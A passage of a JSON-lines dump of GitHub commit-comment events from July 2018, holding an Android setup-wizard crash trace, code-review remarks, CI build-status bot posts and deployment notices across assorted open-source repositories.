java.lang.SecurityException: NetworkScoreService: Neither user 10058 nor current process has android.permission.REQUEST_NETWORK_SCORES.\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.os.Parcel.readException(Parcel.java:2005)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.os.Parcel.readException(Parcel.java:1951)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.net.INetworkScoreService$Stub$Proxy.registerNetworkScoreCache(INetworkScoreService.java:283)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.net.NetworkScoreManager.registerNetworkScoreCache(NetworkScoreManager.java:393)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at com.android.settingslib.wifi.WifiTracker.registerScoreCache(WifiTracker.java:336)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at com.android.settingslib.wifi.WifiTracker.startTracking(WifiTracker.java:311)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at com.google.android.setupwizard.network.WifiModel.startWifiTrackerIfRequired(WifiModel.java:243)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at com.google.android.setupwizard.network.WifiModel.onResume(WifiModel.java:222)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.Fragment.performResume(Fragment.java:2554)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.FragmentManagerImpl.moveToState(FragmentManager.java:1322)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.FragmentManagerImpl.moveFragmentToExpectedState(FragmentManager.java:1557)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.FragmentManagerImpl.moveToState(FragmentManager.java:1618)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.FragmentManagerImpl.dispatchMoveToState(FragmentManager.java:3027)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.FragmentManagerImpl.dispatchResume(FragmentManager.java:2989)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.FragmentController.dispatchResume(FragmentController.java:200)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.Activity.performResume(Activity.java:7138)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.ActivityThread.performResumeActivity(ActivityThread.java:3557)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        ... 10 more\r\n07-04 00:47:04.150   604  6924 W ActivityManager:   Force finishing activity com.google.android.setupwizard/.network.NetworkActivity\r\n07-04 00:47:04.154   604  1025 I ActivityManager: Showing crash dialog for package com.google.android.setupwizard u0\r\n```"}},"created_at":"2018-07-03T16:57:32Z"}
{"id":"7913835534","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29584119,"position":null,"line":null,"path":null,"commit_id":"03f9f93c44700ab429d0e63e9083a00fe08d9364","created_at":"2018-07-03T16:57:52Z","updated_at":"2018-07-03T16:57:52Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-03T16:57:52Z"}
{"id":"7913835745","type":"CommitCommentEvent","actor":{"login":"jermar"},"repo":{"name":"HelenOS/helenos"},"payload":{"comment":{"id":29584120,"position":4,"line":219,"path":"tools/ew.py","commit_id":"2fc9bfdff4f7f7961c56c7e4f3521ee05f4582e8","created_at":"2018-07-03T16:57:54Z","updated_at":"2018-07-03T16:57:54Z","author_association":"MEMBER","body":"I am not sure that would be the correct solution. Some architectures need this option to function properly with ew.py while with your suggestion, this essential feature could be switched off for them via -noserial."}},"created_at":"2018-07-03T16:57:54Z"}
{"id":"7913838725","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29584129,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-03T16:58:29Z","updated_at":"2018-07-03T16:58:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T16:58:29Z"}
{"id":"7913839400","type":"CommitCommentEvent","actor":{"login":"sasi2448"},"repo":{"name":"sasi2448/sasi"},"payload":{"comment":{"id":29584134,"position":null,"line":null,"path":null,"commit_id":"4eee0a147202108c797e48ba0310b2fca5545c71","created_at":"2018-07-03T16:58:37Z","updated_at":"2018-07-03T16:58:37Z","author_association":"OWNER","body":"to find the positive or negative number in python"}},"created_at":"2018-07-03T16:58:37Z"}
{"id":"7913840853","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29584142,"position":15,"line":128,"path":"integration/metadata_globals_queries_test.go","commit_id":"c3afe14e8a096101e7a03b8d7e43c785e3eef7f7","created_at":"2018-07-03T16:58:54Z","updated_at":"2018-07-03T16:58:54Z","author_association":"MEMBER","body":"For this test, let's use vmtracker instead, as we don't have cgroups on mac and our tests will fail. Additionally, we don't have cgroups enabled in CI and they're not necessary for this test."}},"created_at":"2018-07-03T16:58:54Z"}
{"id":"7913842856","type":"CommitCommentEvent","actor":{"login":"dcbriccetti"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584146,"position":8,"line":73,"path":"src/org/opendatakit/briefcase/export/ExportToCsv.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T16:59:17Z","updated_at":"2018-07-03T16:59:17Z","author_association":"OWNER","body":"I didn’t measure memory use with and without the close, so I don’t know. But that was my intention with explicitly closing the stream. "}},"created_at":"2018-07-03T16:59:17Z"}
{"id":"7913843082","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29584148,"position":null,"line":null,"path":null,"commit_id":"03f9f93c44700ab429d0e63e9083a00fe08d9364","created_at":"2018-07-03T16:59:19Z","updated_at":"2018-07-03T16:59:19Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-03T16:59:19Z"}
{"id":"7913844086","type":"CommitCommentEvent","actor":{"login":"jazdw"},"repo":{"name":"infiniteautomation/ma-modules-public"},"payload":{"comment":{"id":29584151,"position":null,"line":null,"path":null,"commit_id":"7b5000f7a36d8742181279e3629302e39524689f","created_at":"2018-07-03T16:59:31Z","updated_at":"2018-07-03T16:59:31Z","author_association":"CONTRIBUTOR","body":"Looks good @terrypacker "}},"created_at":"2018-07-03T16:59:31Z"}
{"id":"7913844170","type":"CommitCommentEvent","actor":{"login":"chutium"},"repo":{"name":"ares-tech/arestech.io"},"payload":{"comment":{"id":29584152,"position":5,"line":83,"path":"src/components/Partners/partners.js","commit_id":"687f9bfc8ce002693ff22114b9887b46cd1bc17f","created_at":"2018-07-03T16:59:32Z","updated_at":"2018-07-03T16:59:32Z","author_association":"MEMBER","body":"name is wrong"}},"created_at":"2018-07-03T16:59:32Z"}
{"id":"7913849996","type":"CommitCommentEvent","actor":{"login":"Panamer"},"repo":{"name":"Panamer/weex-app"},"payload":{"comment":{"id":29584171,"position":null,"line":null,"path":null,"commit_id":"2081bc6d0f7188f7bc6489539b46e8c3d99fbd58","created_at":"2018-07-03T17:00:37Z","updated_at":"2018-07-03T17:00:37Z","author_association":"OWNER","body":"切"}},"created_at":"2018-07-03T17:00:37Z"}
{"id":"7913858755","type":"CommitCommentEvent","actor":{"login":"p3ck"},"repo":{"name":"CentOS-PaaS-SIG/linchpin"},"payload":{"comment":{"id":29584187,"position":11,"line":28,"path":"linchpin/provision/roles/beaker/files/schema.json","commit_id":"013a0169ae027d8ff65659a310f7ff83201b7573","created_at":"2018-07-03T17:02:17Z","updated_at":"2018-07-03T17:02:17Z","author_association":"COLLABORATOR","body":"distro was most certainly required before.  family wasn't in the schema at all."}},"created_at":"2018-07-03T17:02:17Z"}
{"id":"7913859669","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29584190,"position":null,"line":null,"path":null,"commit_id":"68ac6d941c206be9fa92a1003449887d973e2474","created_at":"2018-07-03T17:02:28Z","updated_at":"2018-07-03T17:02:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loon](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loon).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loon-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T17:02:28Z"}
{"id":"7913860894","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29584194,"position":null,"line":null,"path":null,"commit_id":"a0a9d42e298ad321a6a384fcd641c24db4e54a59","created_at":"2018-07-03T17:02:42Z","updated_at":"2018-07-03T17:02:42Z","author_association":"OWNER","body":"LLR: 0.14 (-2.94,2.94) [0.00,5.00]\r\nTotal: 1280 W: 272 L: 260 D: 748"}},"created_at":"2018-07-03T17:02:42Z"}
{"id":"7913865526","type":"CommitCommentEvent","actor":{"login":"willowmagrini"},"repo":{"name":"brasadesign/esquerdaonline-theme"},"payload":{"comment":{"id":29584204,"position":4,"line":10,"path":"content/content-single.php","commit_id":"7e22fe64edeba489511ec5d0aa37c4309dcf1297","created_at":"2018-07-03T17:03:37Z","updated_at":"2018-07-03T17:03:37Z","author_association":"MEMBER","body":"@matheusgimenez imagino que posso tirar isso né?"}},"created_at":"2018-07-03T17:03:37Z"}
{"id":"7913871178","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584215,"position":null,"line":null,"path":null,"commit_id":"ad1c3ff8b782f7e0326e37c324e1c7939450de12","created_at":"2018-07-03T17:04:46Z","updated_at":"2018-07-03T17:04:46Z","author_association":"MEMBER","body":"If you add another 4 spaces to both lines, that should make this note part of the list item."}},"created_at":"2018-07-03T17:04:46Z"}
{"id":"7913875029","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584227,"position":5,"line":12,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"3ca66c00729bf89625f05a7b9218b7da1221dec2","created_at":"2018-07-03T17:05:34Z","updated_at":"2018-07-03T17:05:34Z","author_association":"MEMBER","body":"We should say that this is based off of CDH5"}},"created_at":"2018-07-03T17:05:34Z"}
{"id":"7913880077","type":"CommitCommentEvent","actor":{"login":"mbargull"},"repo":{"name":"mbargull/conda-smithy"},"payload":{"comment":{"id":29584235,"position":12,"line":720,"path":"conda_smithy/configure_feedstock.py","commit_id":"68c42a7fd60fdb8f700207ad97df8f0243025c69","created_at":"2018-07-03T17:06:38Z","updated_at":"2018-07-03T17:06:38Z","author_association":"OWNER","body":"`linked_pkgs[main_pkg]` as well as `linked_pkgs[name]` in the loop below will ungracefully fail with a `KeyError` if the corresponding package is not in `prefix`. That case shouldn't happen, but maybe it'd be better to handle it somehow."}},"created_at":"2018-07-03T17:06:38Z"}
{"id":"7913886518","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29584252,"position":null,"line":null,"path":null,"commit_id":"dff33a44bfcfa692030fb0cf6dfacd81c1a45683","created_at":"2018-07-03T17:07:58Z","updated_at":"2018-07-03T17:07:58Z","author_association":"NONE","body":"If the king is on a1, FileBB[f-1] is not defined.\r\nIf the king is on h1, FileBB[f+1] is not defined. "}},"created_at":"2018-07-03T17:07:58Z"}
{"id":"7913887014","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29584254,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-03T17:08:05Z","updated_at":"2018-07-03T17:08:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T17:08:05Z"}
{"id":"7913889211","type":"CommitCommentEvent","actor":{"login":"pavelrevers"},"repo":{"name":"theKashey/beautiful-react-redux"},"payload":{"comment":{"id":29584257,"position":10,"line":7,"path":"src/patch.js","commit_id":"c8617322ae2af596147207036c503a50dfbd132b","created_at":"2018-07-03T17:08:32Z","updated_at":"2018-07-03T17:08:32Z","author_association":"NONE","body":"@theKashey \r\n\r\nWhy do you patch this path directly instead of patching only \"react-redux\"?\r\n\r\nI have webpack with no \"module\" in the `mainFields` and it's break my code here =("}},"created_at":"2018-07-03T17:08:32Z"}
{"id":"7913891400","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584261,"position":13,"line":13,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:08:59Z","updated_at":"2018-07-03T17:08:59Z","author_association":"MEMBER","body":"\"the BLAHP\""}},"created_at":"2018-07-03T17:08:59Z"}
{"id":"7913892116","type":"CommitCommentEvent","actor":{"login":"ibnesayeed"},"repo":{"name":"oduwsdl/MementoEmbed"},"payload":{"comment":{"id":29584263,"position":null,"line":null,"path":null,"commit_id":"b4834762a432a77ef5e2b31aa2f7a57ecc0edad6","created_at":"2018-07-03T17:09:09Z","updated_at":"2018-07-03T17:09:09Z","author_association":"MEMBER","body":"@shawnmjones, this is a very brittle approach because when the base image changes to a different version of Python and one missed to update these symlinks, the build will silently fail again.\r\n\r\nI would first investigate the container to check whether `Manifest.in` file is properly copying static assets and template files in their proper place. Alternatively, I would add an option in the application to specify static assets and template paths."}},"created_at":"2018-07-03T17:09:09Z"}
{"id":"7913892335","type":"CommitCommentEvent","actor":{"login":"mbargull"},"repo":{"name":"mbargull/conda-smithy"},"payload":{"comment":{"id":29584264,"position":25,"line":733,"path":"conda_smithy/configure_feedstock.py","commit_id":"68c42a7fd60fdb8f700207ad97df8f0243025c69","created_at":"2018-07-03T17:09:11Z","updated_at":"2018-07-03T17:09:11Z","author_association":"OWNER","body":"Maybe this fails if `conda-smithy` is installed via `setup.py develop`/`pip install -e` and the version/commit is changed afterwards :thinking:? Can't remember how `pip` and `conda` behave in that case from the top of my head."}},"created_at":"2018-07-03T17:09:11Z"}
{"id":"7913892946","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584265,"position":14,"line":14,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:09:19Z","updated_at":"2018-07-03T17:09:19Z","author_association":"MEMBER","body":"\"works with Apache 2.4 on EL7\""}},"created_at":"2018-07-03T17:09:19Z"}
{"id":"7913893490","type":"CommitCommentEvent","actor":{"login":"janvernieuwe"},"repo":{"name":"jikan-me/jikan"},"payload":{"comment":{"id":29584268,"position":6,"line":4,"path":".gitignore","commit_id":"4e3464da356673d330b1c916a9f6d1f5855aaa03","created_at":"2018-07-03T17:09:26Z","updated_at":"2018-07-03T17:09:26Z","author_association":"COLLABORATOR","body":"Use the tests as your playground when developing"}},"created_at":"2018-07-03T17:09:26Z"}
{"id":"7913893917","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584269,"position":15,"line":15,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:09:31Z","updated_at":"2018-07-03T17:09:31Z","author_association":"MEMBER","body":"\"fixes issues with llrun\""}},"created_at":"2018-07-03T17:09:31Z"}
{"id":"7913895252","type":"CommitCommentEvent","actor":{"login":"wolfsage"},"repo":{"name":"mmcclimon/Ix"},"payload":{"comment":{"id":29584274,"position":46,"line":253,"path":"lib/Ix/DBIC/ResultSet.pm","commit_id":"9f8c69623d6dc4d7b12eef2f4c515a6e6939c222","created_at":"2018-07-03T17:09:46Z","updated_at":"2018-07-03T17:09:46Z","author_association":"NONE","body":"We should probably uniq created as well"}},"created_at":"2018-07-03T17:09:46Z"}
{"id":"7913897506","type":"CommitCommentEvent","actor":{"login":"EPashkin"},"repo":{"name":"EPashkin/glib"},"payload":{"comment":{"id":29584280,"position":9,"line":9,"path":"src/gobject/auto/binding.rs","commit_id":"2e2b3ef8a7ee7e2d8ce14f195cd45af19dd9d456","created_at":"2018-07-03T17:10:14Z","updated_at":"2018-07-03T17:10:14Z","author_association":"OWNER","body":"It first working version with manual changes.\r\n\r\nIn last commit it replaced with generated code."}},"created_at":"2018-07-03T17:10:14Z"}
{"id":"7913898428","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584281,"position":26,"line":26,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:10:24Z","updated_at":"2018-07-03T17:10:24Z","author_association":"MEMBER","body":"\"Glidein lifetime is no longer based on the length of the proxy\""}},"created_at":"2018-07-03T17:10:24Z"}
{"id":"7913901892","type":"CommitCommentEvent","actor":{"login":"ggalmazor"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584287,"position":8,"line":236,"path":"src/org/opendatakit/briefcase/reused/UncheckedFiles.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T17:11:06Z","updated_at":"2018-07-03T17:11:06Z","author_association":"NONE","body":"Why not `Files.isHidden(dir)`?"}},"created_at":"2018-07-03T17:11:06Z"}
{"id":"7913902448","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584288,"position":27,"line":27,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:11:12Z","updated_at":"2018-07-03T17:11:12Z","author_association":"MEMBER","body":"\"...when the number of job requests drop\""}},"created_at":"2018-07-03T17:11:12Z"}
{"id":"7913902978","type":"CommitCommentEvent","actor":{"login":"janvernieuwe"},"repo":{"name":"jikan-me/jikan"},"payload":{"comment":{"id":29584289,"position":33,"line":33,"path":"src/Parser/Anime/AnimePicturesParser.php","commit_id":"4e3464da356673d330b1c916a9f6d1f5855aaa03","created_at":"2018-07-03T17:11:19Z","updated_at":"2018-07-03T17:11:19Z","author_association":"COLLABORATOR","body":"you can use ->each(function(Crawler $c) {//return code here})\r\nIt's cleaner, and we are using it everywhere else\r\n\r\nWhen no nodes match it returns an empty array, so that is perfect!"}},"created_at":"2018-07-03T17:11:19Z"}
{"id":"7913903646","type":"CommitCommentEvent","actor":{"login":"ibnesayeed"},"repo":{"name":"oduwsdl/MementoEmbed"},"payload":{"comment":{"id":29584290,"position":null,"line":null,"path":null,"commit_id":"b4834762a432a77ef5e2b31aa2f7a57ecc0edad6","created_at":"2018-07-03T17:11:27Z","updated_at":"2018-07-03T17:11:27Z","author_association":"MEMBER","body":"You can run the following command to investigate the state of a container from your image.\r\n\r\n```\r\n$ docker container run --rm -it oduwsdl/mementoembed bash\r\n```"}},"created_at":"2018-07-03T17:11:27Z"}
{"id":"7913904260","type":"CommitCommentEvent","actor":{"login":"emord"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29584292,"position":null,"line":null,"path":null,"commit_id":"3725fc0f3405fb0de0e1c5618e8367495df9b6bf","created_at":"2018-07-03T17:11:34Z","updated_at":"2018-07-03T17:11:34Z","author_association":"CONTRIBUTOR","body":"I've seen that before, but decided not to do that because defining functions in some envs and not others seemed like just another thing making our environments different (although this mostly does the same thing). Anyways I'll change it if we want to start using that pattern"}},"created_at":"2018-07-03T17:11:34Z"}
{"id":"7913905173","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29584293,"position":null,"line":null,"path":null,"commit_id":"d4c96de751d37270a6005b9782adb159802d6113","created_at":"2018-07-03T17:11:46Z","updated_at":"2018-07-03T17:11:46Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-rolefx](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-rolefx).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-rolefx-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T17:11:46Z"}
{"id":"7913907343","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584299,"position":31,"line":31,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:12:12Z","updated_at":"2018-07-03T17:12:12Z","author_association":"MEMBER","body":"\"does not contain the correct path; run in a separate session to support restricted-access CVMFS\""}},"created_at":"2018-07-03T17:12:12Z"}
{"id":"7913908533","type":"CommitCommentEvent","actor":{"login":"SpikeyScout"},"repo":{"name":"Discord-ScoutBot/ScoutBot"},"payload":{"comment":{"id":29584303,"position":null,"line":null,"path":null,"commit_id":"244716731c159db74dd62dcd65372265f7cd2842","created_at":"2018-07-03T17:12:25Z","updated_at":"2018-07-03T17:12:25Z","author_association":"MEMBER","body":"Sorry for the long period before updates lads."}},"created_at":"2018-07-03T17:12:25Z"}
{"id":"7913910051","type":"CommitCommentEvent","actor":{"login":"dcbriccetti"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584306,"position":8,"line":236,"path":"src/org/opendatakit/briefcase/reused/UncheckedFiles.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T17:12:44Z","updated_at":"2018-07-03T17:12:44Z","author_association":"OWNER","body":"Yeah, the inconsistency is glaring, isn’t it? This one doesn’t throw a checked exception (for reasons I didn’t explore deeply)."}},"created_at":"2018-07-03T17:12:44Z"}
{"id":"7913910537","type":"CommitCommentEvent","actor":{"login":"janvernieuwe"},"repo":{"name":"jikan-me/jikan"},"payload":{"comment":{"id":29584307,"position":1,"line":1,"path":"src/Model/AnimePictures.php","commit_id":"4e3464da356673d330b1c916a9f6d1f5855aaa03","created_at":"2018-07-03T17:12:49Z","updated_at":"2018-07-03T17:12:49Z","author_association":"COLLABORATOR","body":"This class is a bit redundant, better to return an array of Picture objects `Picture[]`"}},"created_at":"2018-07-03T17:12:49Z"}
{"id":"7913911434","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29584311,"position":24,"line":213,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"b6e701e9fbd98d29afdc25c9ce09cc9320a94372","created_at":"2018-07-03T17:13:01Z","updated_at":"2018-07-03T17:13:01Z","author_association":"NONE","body":"что-то вот эта строка мне не ясна\r\nты берешь `train.wagons`, т.е. массив объектов класса Вагон и удаляешь из этого массива объект класса `Integer`\r\nкак-то это странно...\r\nк тому же зачем пытаться напрямую использовать метод `delete` у массива, если у тебя в классе Поезд есть специальный метод, который отцепляет вагоны? \r\nнужно использовать этот метод: `remove_wagon(wagon)`\r\nтолько в прошлой редакции ты почему-то вызывал его у вагонов: `train.wagons.remove_wagon(wagon)`, что конечно же неверно и не работало\r\nа вызывать его надо у объекта класса Поезд, потому что это метод из класса Поезд? т.е код должен выглядеть вот так: `train.remove_wagon(wagon)`"}},"created_at":"2018-07-03T17:13:01Z"}
{"id":"7913912424","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584314,"position":28,"line":28,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:13:12Z","updated_at":"2018-07-03T17:13:12Z","author_association":"MEMBER","body":"I don't even know what to do with this one"}},"created_at":"2018-07-03T17:13:12Z"}
{"id":"7913913269","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29584316,"position":46,"line":136,"path":"backup/metadata_globals.go","commit_id":"c3afe14e8a096101e7a03b8d7e43c785e3eef7f7","created_at":"2018-07-03T17:13:23Z","updated_at":"2018-07-03T17:13:23Z","author_association":"MEMBER","body":"We don't want these two PrintObjectMetadata and AddGlobalEntry lines. All of the statements in this context are part of a single resource group."}},"created_at":"2018-07-03T17:13:23Z"}
{"id":"7913914734","type":"CommitCommentEvent","actor":{"login":"UnityBelle"},"repo":{"name":"goaaats/FFXIVPlayerWardrobe"},"payload":{"comment":{"id":29584323,"position":null,"line":null,"path":null,"commit_id":"480da5f067e69ddadc5beb59a9b3782f756f05f8","created_at":"2018-07-03T17:13:39Z","updated_at":"2018-07-03T17:13:39Z","author_association":"NONE","body":"Thank you! Thank you! Thank you! I love the wardrobe so much since my boyfriend found it for me! I've never been happier playing this game. Please keep it up!"}},"created_at":"2018-07-03T17:13:39Z"}
{"id":"7913918938","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29584333,"position":null,"line":null,"path":null,"commit_id":"32d3f7ce47eb9452ba3c9572629ed0ee60893c3f","created_at":"2018-07-03T17:14:27Z","updated_at":"2018-07-03T17:14:27Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T17:14:27Z"}
{"id":"7913919340","type":"CommitCommentEvent","actor":{"login":"jiyinyiyong"},"repo":{"name":"thheller/shadow-cljs"},"payload":{"comment":{"id":29584335,"position":null,"line":null,"path":null,"commit_id":"c84635f3e0bc1aa91e2e469be4d6b8ef750c869b","created_at":"2018-07-03T17:14:31Z","updated_at":"2018-07-03T17:14:31Z","author_association":"COLLABORATOR","body":"npm shows we already have `2.4.14`? https://www.npmjs.com/package/shadow-cljs"}},"created_at":"2018-07-03T17:14:31Z"}
